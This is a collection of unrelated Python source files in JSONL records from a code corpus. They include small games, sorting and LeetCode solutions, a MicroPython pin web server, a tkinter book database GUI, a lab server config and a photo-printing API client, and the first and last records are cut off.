code)\n\n\nif __name__ == '__main__':\n # test()\n print(os.getcwd())\n translate()\n","sub_path":"build/translate_to_golang.py","file_name":"translate_to_golang.py","file_ext":"py","file_size_in_byte":20701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621910394","text":"def selection(arr):\n for i in range(len(arr)-1):\n minVal = arr[i]\n index = i\n for j in range(i+1,len(arr)):\n if minVal > arr[j]:\n minVal = arr[j]\n index = j\n arr[index], arr[i] = arr[i], minVal \n return arr\nprint(selection([5,4,3,2,1]))","sub_path":"sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617639620","text":"import machine\nimport socket\n\n#========================\n# DATA\n#========================\npins = [machine.Pin(i, machine.Pin.IN) for i in (0, 2, 4, 5, 12, 13, 14, 15)]\n\n# In below HTML code, the http-equiv=\"refresh\" content=\"10\" means\n# have the client browser update every 10 seconds\nhtml = \"\"\"\n\n \n ESP8266 Pins \n \n \n

ESP8266 Pins

\n %s
PinValue
\n \n\n\"\"\"\n\ndef do_connect():\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n # pwd.txt should contain wlan name and password on one line\n # with a space between them and nothing else in the file\n (wap, pwd) = open('pwd.txt').read().split()\n print('connecting to network:', wap)\n sta_if.active(True)\n sta_if.connect(wap, pwd)\n while not sta_if.isconnected():\n pass\n print('network config:', sta_if.ifconfig())\n \n\n \n#========================\n# PROGRAM\n#========================\ndo_connect()\n\naddr = socket.getaddrinfo('0.0.0.0', 80)[0][-1]\ns = socket.socket()\ns.bind(addr)\ns.listen(1)\n\nprint('Webserver listening on', addr)\nwhile True:\n cl, addr = s.accept()\n print('client connected from', addr)\n cl_file = cl.makefile('rwb', 0)\n while True:\n line = cl_file.readline()\n if not line or line == b'\\r\\n':\n break\n rows = ['%s%d' % (str(p), p.value()) for p in pins]\n response = html % '\\n'.join(rows)\n cl.send(response)\n cl.close()\n ","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252688578","text":"\"\"\"Rice University Interactive Programming\nRock-paper-scissors-lizard-Spock (RPSLS) is a variant of \nRock-paper-scissors that allows five choices. \nEach choice wins against two other choices, \nloses against two other choices and ties against itself.\nUses modular arithmetic to determine a winner.\n\"\"\"\n# 0 - rock\n# 1 - Spock\n# 2 - paper\n# 3 - lizard\n# 4 - scissors\n\nimport simpleguitk as simplegui\nimport random\n\nplayer_to_print = \" \"\ncomputer_to_print = \" \"\nwinner = \" \"\n\ndef name_to_number(name):\n if name == \"rock\" or name == \"Rock\":\n return 0\n elif name == \"Spock\" or name == \"spock\":\n return 1\n elif name == \"paper\" or name == \"Paper\":\n return 2\n elif name == \"lizard\" or name == \"Lizard\":\n return 3\n elif name == \"scissors\" or name == \"Scissors\":\n return 4\n else:\n return \"Not a valid option\"\n\ndef number_to_name(number):\n if number == 0:\n return \"rock\"\n elif number == 1:\n return \"Spock\"\n elif number == 2:\n return \"paper\"\n elif number == 3:\n return \"lizard\"\n elif number == 4:\n return \"scissors\"\n else:\n return \"Not a valid option\"\n \ndef rpsls(player_choice):\n global player_to_print, computer_to_print, winner\n \n # player choice\n player_to_print = str(\"Player chooses: \" + player_choice)\n player_number = name_to_number(player_choice)\n \n #computer choice\n comp_number = random.randrange(0,5)\n comp_choice = number_to_name(comp_number)\n computer_to_print = str(\"Computer chooses: \" + comp_choice)\n \n #winner\n winner = (comp_number - player_number) % 5\n if ((player_number - comp_number)%5)>= 3:\n winner = \"Computer wins!\"\n elif ((player_number - comp_number)%5) == 0:\n winner = \"Player and computer tie!\"\n else:\n winner = \"Player wins!\"\n \ndef restart():\n global player_to_print, computer_to_print, winner\n player_to_print = \" \"\n computer_to_print = \" \"\n winner = \" \"\n \n#interactive rpsls\n\ndef get_guess(guess):\n #if not an accepted input\n global winner\n if not (guess == \"rock\" or guess == \"Rock\" or guess == \"Spock\" or guess == \"spock\" \n or guess == \"paper\" or guess == \"Paper\" or guess == \"lizard\" or\n guess == \"Lizard\" or guess == \"scissors\" or guess == \"Scissors\"):\n winner = 'Error: Bad input, not an included choice'\n else:\n rpsls(guess)\n \ndef draw(canvas):\n #draw output in frame\n canvas.draw_text(player_to_print, [20, 50], 20, \"Green\")\n canvas.draw_text(computer_to_print, [20, 85], 20, \"Green\")\n canvas.draw_text(winner, [20, 125], 20, \"Green\")\n \n#create frame\nframe = simplegui.create_frame(\"Rock-Paper-Scissors-Lizard-Spock\", 400, 200)\nframe.add_input(\"Player Choice\", get_guess, 200)\nframe.set_canvas_background(\"Pink\")\nframe.set_draw_handler(draw)\nframe.add_button(\"Clear board\", restart, 100)\n\nframe.start()","sub_path":"rpsls.py","file_name":"rpsls.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647309445","text":"import ReadCounts, Tools, TailSeqAnalyzer\nfrom BlastTailAnalyzer import fullBlastTailer\nfrom ThreeSeqAnalyzer import blaster\n\n\n\ndef hitFinder(target, r1, r2):\n \"\"\"Barcode added by Rea's protocol is found on the 5' end of the read. That barcode can be found in r1 if the read\n is short enough, but you'll definitely see it in read 2 since that starts from the 5' end. Using the illumina\n platform, r1 will need to be reverse complemented to be correct and r2 will need to not be. This function finds all\n reads with the barcode in r1 and then returns the corresponding r2 reads.\"\"\"\n\n hits = []\n for i in range(0, len(r2)):\n if target in r2[i]:\n hits.append(r1[i])\n\n return hits\n\ndef deMultiplexer(name, barcode, ranMerLen, r1, r2, mismatch=0):\n \"\"\"Takes the name of the sample, the barcode sequence, and the length of the randomMer. Finds the barcode in read1,\n returns the corresponding reads in read2, performs the read count operation and outputs it to a folder with the\n samplename.csv\"\"\"\n print(name, barcode, ranMerLen)\n hits = hitFinder(barcode, r1, r2)\n\n counts = ReadCounts.readCounter(hits, ranMerLen=ranMerLen, mismatch=mismatch)\n\n return counts\n\ndef batchDeMultiplexer(r1Loc, r2Loc, manifestLoc, outLoc, header=True):\n \"\"\"Takes every line of a standard manifest file and uses that to perform a read counts on each one. Can specify\n whether or not it has a header.\"\"\"\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n assert len(r1) == len (r2)\n\n manifest = open(manifestLoc, 'r')\n if header: next(manifest) #skips header\n for line in manifest:\n line = line.split(\",\")\n name = line[0]\n barcode = line[2].rstrip() + line[3].rstrip()\n ranMerLen = int(line[4]) + 2\n counts = deMultiplexer(name, barcode, ranMerLen, r1, r2)\n counts = sorted(counts, key = lambda x:x[2], reverse = True)\n Tools.CSVWriter(counts, outLoc+name+\".csv\",header=\"Read,Total Reads,Unique Reads\")\n\n return 0\n\ndef newDeMultiplexer(manifestLoc, inFolder, outFolder, header = True):\n #inFolder/701501r1.fasta.gz\n manifest = open(manifestLoc, 'r')\n if header: next(manifest)\n for line in manifest:\n line = line.rstrip().split(\",\")\n print(line[0], line[2], line[4], line[5], line[6])\n r1Loc = inFolder + line[5] + line[6] +\"r1.fastq.gz\"\n r2Loc = inFolder + line[5] + line[6] +\"r2.fastq.gz\"\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n\n counts = deMultiplexer(line[0], line[2]+line[3], int(line[4])+2, r1, r2)\n counts = blaster(counts, dbLoc = \"YRNA.fa\", blastLoc = \"blastn.exe\")\n tails = fullBlastTailer(counts)\n Tools.CSVWriter(tails, outFolder+line[0]+\"_tails.csv\", header =\"Sequence,UniqueReads,Gene,3'end,tailLength,TailSeq\")\n\n\n\n\n\n\n\n\n\n\n#######################################################################\n\nif __name__==\"__main__\":\n\n manifestLoc=\"\"\n outFolder = \"\"\n r1Loc = \"\"\n r2Loc = \"\"\n header = True\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n assert len(r1) == len (r2)\n\n manifest = open(manifestLoc, 'r')\n if header: next(manifest) #skips header\n for line in manifest:\n line = line.split(\",\")\n name = line[0]\n barcode = line[2].rstrip() + line[3].rstrip()\n ranMerLen = int(line[4]) + 2\n counts = deMultiplexer(name, barcode, ranMerLen, r1, r2)\n counts = sorted(counts, key = lambda x:x[2], reverse = True)\n tails = fullBlastTailer(counts, fastaTargets = \"yRNA+uRNA.fa\")\n Tools.CSVWriter(tails, outFolder+name+\".csv\", header=\"Sequence,UniqueReads,Gene,3'end,tailLength,TailSeq\")\n\n\n\n\n\n","sub_path":"deMultiplexer.py","file_name":"deMultiplexer.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"263180347","text":"\"\"\"\nGiven an integer n and an integer start.\n\nDefine an array nums where nums[i] = start + 2*i (0-indexed) and n == nums.length.\n\nReturn the bitwise XOR of all elements of nums.\n\n\n\nExample 1:\n\nInput: n = 5, start = 0\nOutput: 8\nExplanation: Array nums is equal to [0, 2, 4, 6, 8] where (0 ^ 2 ^ 4 ^ 6 ^ 8) = 8.\nWhere \"^\" corresponds to bitwise XOR operator.\n\nConstraints:\n\n1 <= n <= 1000\n0 <= start <= 1000\nn == nums.length\n\"\"\"\n\n\ndef xorOperation(n: int, start: int) -> int:\n count = start\n while n - 1 > 0:\n count ^= 2 + start\n n -= 1\n start += 2\n return count\n","sub_path":"easy/1486 XOR Operation in an Array/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"503212072","text":"from KMean import Cluster as c\nfrom KMean import Point as p\nfrom datetime import datetime as dt\nimport jsonpickle\nimport json\ndef find_largest_cluster():\n\tmax_val =0\n\tindex=0\n\tcount=0\n\tfor cluster in clusters:\n\t\tclust_size = cluster.get_size()\n\t\tif (clust_size>max_val):\n\t\t\tmax_val=clust_size\n\t\t\tindex=count\n\t\tcount+=1\n\treturn clusters[index]\n\n\n#create clusters/ loads previous data\njson_file = open(\"out.json\", 'r')\nclusters = []\nfor line in json_file:\n\tclusters.append(jsonpickle.decode(line))\njson_file.close()\n#for x in range (0,23):\n#\tclusters.append(c(str(x)))\n\n\nnum_val =input(\"Enter your favourite number: \")\nif (int(num_val)>99):\n\tprint (\"Please enter a number from 0-99\")\n\tnum_val =input(\"Enter your favourite number:\")\n\n\n\n\nwhile (num_val != \"Quit\"):\n\tpoint = p(num_val,dt.now().strftime('%H'))\n\tclusters[int(point.get_y())].add_in_cluster(point)\n\t#calc the centroids\n\tfor cluster in clusters:\n\t\tcluster.calc_centroid()\n\n\n\tlargest_cluster = find_largest_cluster()\n\n\tfave_point = largest_cluster.get_close_centroid()\n\n\tprint (fave_point.get_x())\n\t#checks to quit or learn more.\n\tnum_val = input(\"Enter your favourite number: \")\n\n##save the data\njson_file = open(\"out.json\", 'w')\nfor cluster in clusters:\n\ts = jsonpickle.dumps(cluster)\n\tjson_file.write(s+\"\\n\")\n\njson_file.close()\n","sub_path":"ProjDelta.py","file_name":"ProjDelta.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617551133","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef rechannelize(pulse, nchan):\n pulse = np.fft.irfft(pulse, axis=1)\n # Reshape to channels and keep polarization\n if pulse.shape[-1] == 2:\n pulse = pulse.reshape(-1, 2*nchan, 2)\n else:\n pulse = pulse.reshape(-1, 2*nchan)\n pulse = np.fft.rfft(pulse, axis=1)\n return pulse\n\n# Stored each pulse as voltages with 4096 channels\n# Array with dimensions [time, freq, pol]\np1 = np.load('/mnt/raid-cita/ramain/p1.npy')\np2 = np.load('/mnt/raid-cita/ramain/p2.npy')\n\np1_coarse = rechannelize(p1, 128)\n\np1fine = rechannelize(p1, 2**16)\np2fine = rechannelize(p2, 2**16)\n\np1_selfphased = (p1fine / p1fine) * abs(p1fine)\np1_polphased = (p1fine[...,0] / p1fine[...,1]) * abs(p1fine[...,1])\np1_phased = (p1fine / p2fine) * abs(p2fine)\n\np1_selfphased = rechannelize(p1_selfphased, 128)\np1_polphased = rechannelize(p1_polphased, 128)\np1_phased = rechannelize(p1_phased, 128)\n\nplt.plot(abs(p1_coarse[...,0]).sum(1),'b', label='original signal')\nplt.plot(abs(p1_selfphased[...,0]).sum(1), 'g', label='self phased')\nplt.plot(abs(p1_polphased).sum(1), 'k', label='self pol phased')\nplt.plot(abs(p1_phased[...,0]).sum(1), 'r', label='2 pulse phased')\n\nplt.yscale('log')\nplt.xlim(3500, 5500)\nplt.ylim(80, 10000)\nplt.legend()\nplt.show()\n","sub_path":"crab/rechan.py","file_name":"rechan.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192034097","text":"from celery.schedules import crontab\nimport os\n\n\n# groupid=0 -> admin\n# groupid=1 -> Our users\n# groupid=2 -> Other users\ndef create_rule(user):\n create_param = {}\n if user.groupid <= 1:\n create_param.update({\n 'groupname': 'toolmen',\n 'homepath': user.name,\n 'homepvc': \"nfs-homenas\",\n 'naspvc': \"nfs-labnas\",\n })\n elif user.groupid == 2:\n create_param.update({\n 'groupname': 'test',\n 'homepath': 'others/' + user.name,\n 'homepvc': \"nfs-homenas\",\n 'naspvc': \"\",\n })\n return create_param\n\ndef gpu_is_free(value):\n \"\"\"\n The decision function of finding server with available gpu.\n Parameters\n ----------\n value: array\n A array of time series array of each metrics.\n e.g. [A metrics time series, B metrics time series]\n \"\"\"\n duty = sum(value[0]) / len(value[0])\n memory = sum(value[1]) / len(value[1])\n return duty < 10 and memory < 1\n\n\nconfig = {\n # Basic\n 'bullet': \"\",\n 'name': 'Toolmen',\n 'domain_name': '{{ domain_name }}',\n 'SECRET_KEY': '{{ secretkey }}',\n\n # Sehedule\n 'celery_schedule': {\n # Maintain all instances(at 2 a.m.)\n 'box-routine': {\n 'task': 'labboxmain.box.routineMaintain',\n 'schedule': crontab(hour=2, minute=0),\n },\n },\n\n # Link\n 'links': [{\n 'name': 'Monitor',\n 'link': '/monitor/'\n }, {\n 'name': 'Drive',\n 'link': '/drive/'\n }, {\n 'name': 'Help',\n 'link': '/help'\n }\n ],\n\n # Registry settigs\n 'registry_url': 'harbor.default.svc.cluster.local', # empty to disable\n 'registry_user': 'user',\n 'registry_password': '{{ registry_password }}',\n 'registry_repo_backup': 'user/backup',\n 'registry_repo_default': 'linnil1/serverbox',\n\n # Data path\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:////data/db.sqlite',\n 'logfile': '/data/main_log.log',\n\n # init\n 'create_rule': create_rule,\n 'OAUTH2_REFRESH_TOKEN_GENERATOR': True,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SCHEDULER_API_ENABLED': True,\n\n # Method for connecting to pod\n 'sshpiper': '/data/sshpiper/',\n 'vnc_password': '{{ vncpw }}',\n\n # Only use dockerapi(Not maintained now)\n # 'labboxapi-docker': 'http://dockerserver:3476', # Use without kubernetes\n\n # Use k8s api\n 'labboxapi-k8s': \"http://{}:3476\".format(os.environ.get(\"NAME_K8SAPI\")),\n\n # Backgroud method\n 'celery_broker_url': 'redis://{}:6379'.format(os.environ.get(\"NAME_REDIS\")),\n 'celery_result_backend': 'redis://{}:6379'.format(os.environ.get(\"NAME_REDIS\")),\n\n # for email\n 'email_sender': \"http://{}:5870/mail\".format(os.environ.get(\"NAME_EMAIL_SENDER\")),\n 'email_title': {\n 'register': \"Registration of ToolmenLab\",\n 'forgetpass': \"Reset Password for ToolmenLab\"\n },\n\n # GPU settings\n # Details see in box_queue.py\n # set gpu_monitor_url = null to disable monitor gpu\n # 'gpu_monitor_url': '',\n 'queue_quota': 6,\n 'gpu_monitor_url': 'http://lab-monitor-prometheus-server.monitor.svc.cluster.local/api/v1/',\n 'gpu_query_metrics': ['nvidia_gpu_duty_cycle', 'nvidia_gpu_memory_used_bytes / nvidia_gpu_memory_total_bytes'],\n 'gpu_is_free': gpu_is_free,\n 'gpu_query_interval': 60,\n 'gpu_exe_interval': 300,\n}\n\n# Running queue(Not need to change)\nconfig['celery_schedule']['queue-run'] = {\n 'task': 'labboxmain.box_queue.scheduleGPU',\n 'schedule': crontab(minute='*'),\n}\n","sub_path":"labboxmain/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"597970554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 23 16:17:38 2019\r\n\r\n@author: Silvester\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport book_store_backend_networked\r\n\r\ndef get_selected_row(event):\r\n try:\r\n global selected_tuple\r\n index=list_box.curselection()[0]\r\n selected_tuple=list_box.get(index)\r\n #print(index)\r\n #print(selected_tuple[3])\r\n #return(selected_tuple) no need to return selected_tuple, its a global variable and we can point to it\r\n ent_title.delete(0,tk.END)\r\n ent_title.insert(tk.END,selected_tuple[1])\r\n ent_author.delete(0,tk.END)\r\n ent_author.insert(tk.END,selected_tuple[2])\r\n ent_year.delete(0,tk.END)\r\n ent_year.insert(tk.END,selected_tuple[3])\r\n ent_isbn.delete(0,tk.END)\r\n ent_isbn.insert(tk.END,selected_tuple[4])\r\n except IndexError:\r\n pass\r\n \r\ndef view_in_listbox():\r\n list_box.delete(0,tk.END)#empty the list, wont allow adding more rows if view is clicked multiple times \r\n for row in book_store_backend_networked.view_all():\r\n list_box.insert(tk.END, row)# \"END\" inserts a new row at the end of the existing rows\r\n #print(row)\r\n \r\ndef search_command():\r\n list_box.delete(0,tk.END)\r\n for row in book_store_backend_networked.search(ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get()):\r\n list_box.insert(tk.END, row)\r\n \r\ndef add_entry():\r\n book_store_backend_networked.add(ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get())\r\n list_box.delete(0,tk.END)\r\n list_box.insert(tk.END, (ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get()))\r\n view_in_listbox()\r\n \r\ndef delete_command():\r\n book_store_backend_networked.delete(selected_tuple[0])\r\n #print(selected_tuple)\r\n #print(selected_tuple[0])\r\n view_in_listbox()\r\n \r\ndef update_command():\r\n book_store_backend_networked.update(selected_tuple[0],ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get())\r\n view_in_listbox()\r\n \r\nwindow_main = tk.Tk()\r\nwindow_main.wm_title(\"Book Store NetDB 3.0\")\r\n\r\nl_title = tk.Label(window_main,text=\"Title\",anchor=tk.CENTER)\r\nl_title.grid(row=0,column=0)\r\n\r\nl_year = tk.Label(window_main,text=\"Year\",anchor=tk.CENTER)\r\nl_year.grid(row=1,column=0)\r\n\r\nl_author = tk.Label(window_main,text=\"Author\",anchor=tk.CENTER)\r\nl_author.grid(row=0,column=2)\r\n\r\nl_isbn = tk.Label(window_main,text=\"ISBN\",anchor=tk.CENTER)\r\nl_isbn.grid(row=1,column=2)\r\n\r\nent_title=tk.StringVar()\r\nent_title=tk.Entry(window_main,textvariable=ent_title)\r\nent_title.grid(row=0,column=1)\r\n\r\nent_author=tk.StringVar()\r\nent_author=tk.Entry(window_main,textvariable=ent_author)\r\nent_author.grid(row=0,column=3)\r\n\r\nent_year=tk.StringVar()\r\nent_year=tk.Entry(window_main,textvariable=ent_year)\r\nent_year.grid(row=1,column=1)\r\n\r\nent_isbn=tk.StringVar()\r\nent_isbn=tk.Entry(window_main,textvariable=ent_isbn)\r\nent_isbn.grid(row=1,column=3)\r\n\r\nbtn_view_all=tk.Button(window_main,text=\"View All\", width=12, command = view_in_listbox)\r\nbtn_view_all.grid(row=2,column=3)\r\n\r\nbtn_search=tk.Button(window_main,text=\"Search\", width=12, command = search_command)\r\nbtn_search.grid(row=3,column=3)\r\n\r\nbtn_add=tk.Button(window_main,text=\"Add\", width=12, command = add_entry)\r\nbtn_add.grid(row=4,column=3)\r\n\r\nbtn_update=tk.Button(window_main,text=\"Update\", width=12, command = update_command)\r\nbtn_update.grid(row=5,column=3)\r\n\r\nbtn_delete=tk.Button(window_main,text=\"Delete\", width=12, command = delete_command)\r\nbtn_delete.grid(row=6,column=3)\r\n\r\nbtn_close=tk.Button(window_main,text=\"Close\", width=12, command = window_main.destroy)\r\nbtn_close.grid(row=7,column=3)\r\n\r\nlist_box=tk.Listbox(window_main,height=6,width=35)\r\nlist_box.grid(row=2, column=0, rowspan=6, columnspan=2)\r\n\r\nscroll_bar=tk.Scrollbar(window_main)\r\nscroll_bar.grid(row=2, column=2, rowspan=6)\r\n\r\nlist_box.configure(yscrollcommand=scroll_bar.set)\r\nscroll_bar.configure(command=list_box.yview)\r\n\r\nlist_box.bind('<>', get_selected_row)\r\n\r\nwindow_main.mainloop()","sub_path":"Section_22_App_5_Build_a_Desktop_Database/book_store_frontend_networked_V3.py","file_name":"book_store_frontend_networked_V3.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65792647","text":"\n\ndef ep(s, l, r):\n\tls = len(s)\n\twhile l >= 0 and r < ls and s[l] == s[r]:\n\t\tl -= 1\n\t\tr += 1\n\treturn l + 1, r - 1\n\ndef f(st):\n\tls = len(st)\n\t'''\n\tif ls < 2:\n\t\treturn st\n\t'''\n\ts = 0\n\te = 0\n\tfor i in range(ls):\n\t\t# 中心就是i和i之间的位置\n\t\ts1, e1 = ep(st, i, i)\n\t\t# 中心就是i和i + 1之间的位置\n\t\ts2, e2 = ep(st, i, i + 1)\n\t\tif e1 - s1 > e - s:\n\t\t\ts = s1\n\t\t\te = e1\n\t\tif e2 - s2 > e - s:\n\t\t\ts = s2\n\t\t\te = e2\n\n\treturn st[s: e + 1]\n\nif __name__ == '__main__':\n\ts = 'ab'\n\tprint(f(s))\n","sub_path":"wait_merge/leetcode/Algorithms/M.5.最长回文子串/finish.py","file_name":"finish.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483724671","text":"import sys\nsys.stdin = open(\"input.txt\")\nT = 10\nfor tc in range(1, T+1):\n N = int(input())\n arr = input()\n\n stack1 = []\n result = 1\n #왼쪽괄호들을 다 스택에 저장하고 오른쪽 괄호를 만난다면 pop해서 비교\n for i in range(N):\n if arr[i] == '(' or arr[i] == '{' or arr[i] == '[' or arr[i] == '<':\n stack1.append(arr[i])\n\n if arr[i] == ')':\n if len(stack1) > 0 and stack1.pop() != '(':\n result = 0\n break\n if arr[i] == '}':\n if len(stack1) > 0 and stack1.pop() != '{':\n result = 0\n break\n if arr[i] == ']':\n if len(stack1) > 0 and stack1.pop() != '[':\n result = 0\n break\n if arr[i] == '>':\n if len(stack1) > 0 and stack1.pop() != '<':\n result = 0\n break\n\n\n\n print(\"#{} {}\".format(tc,result ))\n\n\n\n\n","sub_path":"SWEA/1218_괄호짝짓기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22127916","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\n##############export checkpoint file into air, mindir and onnx models#################\n\"\"\"\nimport numpy as np\nfrom mindspore import Tensor, context, load_checkpoint, export, load_param_into_net\nfrom eval import ModelBuilder\n\nfrom src.model_utils.config import config\nfrom src.model_utils.moxing_adapter import moxing_wrapper\n\n\ncontext.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n max_call_depth=10000)\n\ndef modelarts_pre_process():\n pass\n\n@moxing_wrapper(pre_process=modelarts_pre_process)\ndef export_fibinet():\n \"\"\" export_fibinet \"\"\"\n net_builder = ModelBuilder()\n _, eval_net = net_builder.get_net(config)\n\n param_dict = load_checkpoint(config.ckpt_file)\n load_param_into_net(eval_net, param_dict)\n eval_net.set_train(False)\n\n ids = Tensor(np.ones([config.eval_batch_size, config.field_size]).astype(np.int32))\n wts = Tensor(np.ones([config.eval_batch_size, config.field_size]).astype(np.float32))\n label = Tensor(np.ones([config.eval_batch_size, 1]).astype(np.float32))\n input_tensor_list = [ids, wts, label]\n export(eval_net, *input_tensor_list, file_name=config.file_name, file_format=config.file_format)\n\nif __name__ == '__main__':\n export_fibinet()\n","sub_path":"research/recommend/fibinet/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146202549","text":"\"\"\"\nPython client for the Pwinty photo printing API\n\nCopyright Sam Willis 2014\nhttp://www.github.com/samwillis/py-pwinty\n\n\"\"\"\n\nimport requests # The only none standard requirement\nimport hashlib\nimport json\nimport os\n\n\napikey = None # Set to your Pwinty API Key\nsandbox = False # Sets whether to use the sandbox or live API\n\nVERSION = '0.4.0'\nAPI_VERSION = 'v4.0'\n\n# The HTTP endpoints for the api\nLIVE_API_URL = \"https://api.prodigi.com/%s/\" % API_VERSION\nSANDBOX_API_URL = \"https://api.sandbox.prodigi.com/%s/\" % API_VERSION\n\n\ndef set_apikey(value):\n \"\"\"\n This function can be used to set the API Key.\n Alternatvly you can do:\n >>> import pwinty\n >>> pwinty.apikey = \"xxxxxxx\"\n \"\"\"\n global apikey\n apikey = value\n\ndef underscore_to_camelcase(value):\n \"\"\"\n Converts underscore notation (something_named_this) to camelcase notation (somethingNamedThis)\n\n >>> underscore_to_camelcase('country_code')\n 'countryCode'\n >>> underscore_to_camelcase('country')\n 'country'\n >>> underscore_to_camelcase('price_GBP')\n 'priceGBP'\n >>> underscore_to_camelcase('recommended_horizontal_resolution')\n 'recommendedHorizontalResolution'\n >>> underscore_to_camelcase('postal_or_zip_code')\n 'postalOrZipCode'\n >>> underscore_to_camelcase('test_ABC_test')\n 'testABCTest'\n \"\"\"\n words = value.split('_')\n return '%s%s' % (words[0], ''.join(x if x.isupper() else x.capitalize() for x in words[1:]))\n\ndef underscore_to_camelcase_dict(d):\n \"Converts a dicts keys to camelcase\"\n return {underscore_to_camelcase(key):value for key, value in d.items()}\n\ndef camelcase_to_underscore(value):\n \"\"\"\n Converts camelcase notation (somethingNamedThis) to underscore notation (something_named_this)\n\n >>> camelcase_to_underscore('countryCode')\n 'country_code'\n >>> camelcase_to_underscore('country')\n 'country'\n >>> camelcase_to_underscore('priceGBP')\n 'price_GBP'\n >>> camelcase_to_underscore('recommendedHorizontalResolution')\n 'recommended_horizontal_resolution'\n >>> camelcase_to_underscore('postalOrZipCode')\n 'postal_or_zip_code'\n >>> camelcase_to_underscore('testABCTest')\n 'test_ABC_test'\n \"\"\"\n length = len(value)\n out = ''\n for i in xrange(length):\n char = value[i]\n last_char = value[i-1]\n next_char = None\n if i != length-1:\n next_char = value[i+1]\n if i == 0 or char.islower():\n out += char\n elif last_char.islower():\n if next_char and next_char.isupper():\n out += '_%s' % char\n else:\n out += '_%s' % char.lower()\n else:\n if next_char and next_char.islower():\n out += '_%s' % char.lower()\n else:\n out += char\n return out\n\ndef _request(end_point, method, params=None, data=None, files=None):\n headers = {\n 'X-API-Key': apikey,\n 'Content-type': 'application/json'\n\n }\n if not data and not files:\n headers['Content-Length'] = '0'\n\n if sandbox:\n url = SANDBOX_API_URL\n else:\n url = LIVE_API_URL\n\n if params:\n params = underscore_to_camelcase_dict(params)\n if data:\n data = underscore_to_camelcase_dict(data)\n data = json.dumps(data)\n if files:\n files = underscore_to_camelcase_dict(files)\n\n\n r = requests.request(method, url + end_point, headers=headers, params=params, data=data, files=files)\n\n\n if r.status_code in (200, 201):\n if r.text:\n print(r.text)\n print(r)\n return json.loads(r.text)\n else:\n return r.content\n else:\n if r.text:\n json_obj = json.loads(r.text)\n print(json_obj)\n print(r)\n print(r.text)\n if 'errorMessage' in json_obj:\n message = json_obj['errorMessage']\n else:\n message = json_obj\n print(message)\n response = r.text\n\n else:\n message = r.content\n response = r.content\n if r.status_code == 400:\n raise PwintyBadInputError(message, response)\n elif r.status_code == 403:\n raise PwintyForbiddenError(message, response)\n elif r.status_code == 404:\n raise PwintyMissingError(message, response)\n elif r.status_code == 500:\n raise PwintyServerError(message, response)\n else:\n raise PwintyError(message, response, r.status_code)\n\n\nclass Resource(object):\n def __init__(self, json):\n self._json = json\n\n _json = {}\n _id_field_name = None\n _editable_fields = ()\n\n def keys(self):\n hide_keys = ('photos',)\n return [camelcase_to_underscore(key) for key in self._json.keys() if key not in hide_keys] \n\n def get_dict(self):\n return {key: self.__getattr__(key) for key in self.keys()}\n\n def get_json(self):\n return self._json\n\n def items(self):\n return self.get_dict().items()\n\n def values(self):\n return self.get_dict().values()\n\n def __getattr__(self, name):\n name = underscore_to_camelcase(name)\n if name in self._json:\n value = self._json[name]\n if type(value) == dict:\n value = Resource(value)\n elif type(value) == list:\n value = [Resource(v) if type(v)==dict else v for v in value]\n return value\n else:\n raise ValueError()\n\n def 